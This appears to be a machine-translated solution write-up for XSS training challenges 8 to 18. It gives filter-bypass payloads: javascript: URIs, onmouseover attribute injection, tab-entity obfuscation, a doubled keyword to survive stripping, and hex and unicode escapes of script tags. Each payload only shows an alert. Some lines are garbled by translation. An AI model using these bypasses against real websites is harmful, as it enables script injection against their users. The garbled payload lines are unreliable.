Challenge 8:
JS Pseudo-Protocol application, please use IE browser
Enter the following javascript:alert (Document.domain);
Challenge 9:
Hint to use utf-7 XSS to do, but I did not do it.
Challenge 10:
This discovery filtered domain, can be constructed as follows "Onmouseover=alert (Document.domadomainin); This will create a new domain after filtering out domain
Challenge 11
"><a href=" javascr& #09; Ipt:alert (document.domain); " >12</a>
Idea, use & #09 (Escape tab) to avoid filtering,& #09需要用在url中, so build a hyperlink.
Click to pass.
Challenge 12:
Found it filtered out "<>. With IE you can use two anti-single quotes to close the value, the browser will not automatically add ". 、
"Onmouseover=alert (Document.domain);
It seems that this method does not work on Firefox.
Challenge 13:
Challenge 14:,
The above two topics can be implemented on the IE8 kernel, because the vulnerability is no longer time-sensitive, here a little
Challenge 15
It was observed that the contents of the text box were placed in the Document.writer, but the contents of the following were filtered
Can be escaped using the 16 ASCII code,
Then found \ was harmonized, so use two \ pair \ to escape
The code is as follows \\x3cscript\\x3ealert (document.domain); \\x3c/script\\x3e
Submit a popup window.
Challenge 16:
Principle same as Challenge15 this time cannot be escaped with 16 binary, can be used 10 binary or octal
Take the 8 binary as an example
\\u003cscript\\u003ealert (document.domain); \\u003c/script\\u003e
Submit pop-up window successfully
Challenge 17:
Challenge 18
If you don't have a problem with timeliness, let's skip it.
XSS Challenge problem-solving ideas (8-18)